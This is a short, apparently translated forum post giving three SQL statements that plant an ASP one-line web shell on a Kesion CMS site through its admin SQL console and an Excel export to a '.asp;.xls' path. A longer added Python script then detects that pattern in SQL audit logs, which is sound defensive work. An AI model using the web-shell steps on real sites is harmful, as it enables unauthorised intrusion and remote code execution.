Some time ago Ghost brother published a Kesion arbitrary download vulnerability and how to get a shell with it. In fact, getting the shell is very simple, and there are many methods. A friend just asked me to get a shell, so I wrote up one method of getting a shell for your reference.
Open the SQL command execution function.
create table 0ldgui (a varchar(50))    -- create a table
insert into 0ldgui (a) values ('<%execute request("0ldgui")%>')    -- insert the one-line script
select * into [a] in 'f:/web/0ldgui.asp;.xls' 'excel 4.0;' from 0ldgui    -- export; the absolute path can be seen in the database backup function
This is a very common ASP + SQL method of getting a shell.
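From the defender's side, the three statements above leave a recognisable pattern in any record of what the admin SQL console executed. The following is an added example, not part of the original post: it flags script delimiters inside a statement and Jet-style exports to a file name carrying a script extension. The log source, the `SCRIPT_EXTS` list and all function names are assumptions.

```python
import re

# Jet/Access external-export clause: SELECT ... INTO [t] IN '<path>' '<driver>' FROM ...
EXPORT_RE = re.compile(
    r"select\b.+?\binto\b.+?\bin\s+'(?P<path>[^']+)'\s+'[^']*'",
    re.IGNORECASE | re.DOTALL)
# Server-side script delimiters inside a statement (the page's INSERT carries one).
SCRIPT_RE = re.compile(r"<%.*?%>", re.DOTALL)
# Assumption: extensions mapped to a script handler on this server; adjust per site.
SCRIPT_EXTS = ("asp", "aspx")

def risky_filename(path):
    """True if the file name has a script extension, either as its final
    extension or in the part before a ';' (the shape used on this page)."""
    name = re.split(r"[\\/]", path)[-1].lower()
    head = name.split(";")[0]
    return any(part.endswith("." + ext)
               for part in (name, head) for ext in SCRIPT_EXTS)

def classify(statement):
    """Return the list of findings for one SQL statement."""
    findings = []
    if SCRIPT_RE.search(statement):
        findings.append("script-literal")
    match = EXPORT_RE.search(statement)
    if match:
        findings.append("external-export")
        if risky_filename(match.group("path")):
            findings.append("export-to-script-path")
    return findings

def scan(statements):
    """Map statement index -> findings, skipping clean statements."""
    hits = {}
    for index, statement in enumerate(statements):
        findings = classify(statement)
        if findings:
            hits[index] = findings
    return hits

# Constructed audit log: one benign query, the page's three statements,
# and one benign spreadsheet export (table and path names are made up).
SAMPLE = [
    "select id, title from articles where id = 5",
    "create table 0ldgui (a varchar(50))",
    """insert into 0ldgui (a) values ('<%execute request("0ldgui")%>')""",
    "select * into [a] in 'f:/web/0ldgui.asp;.xls' 'excel 4.0;' from 0ldgui",
    "select * into [q1] in 'd:/reports/q1.xls' 'excel 8.0;' from orders",
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE).items():
        print(index, findings, SAMPLE[index])
```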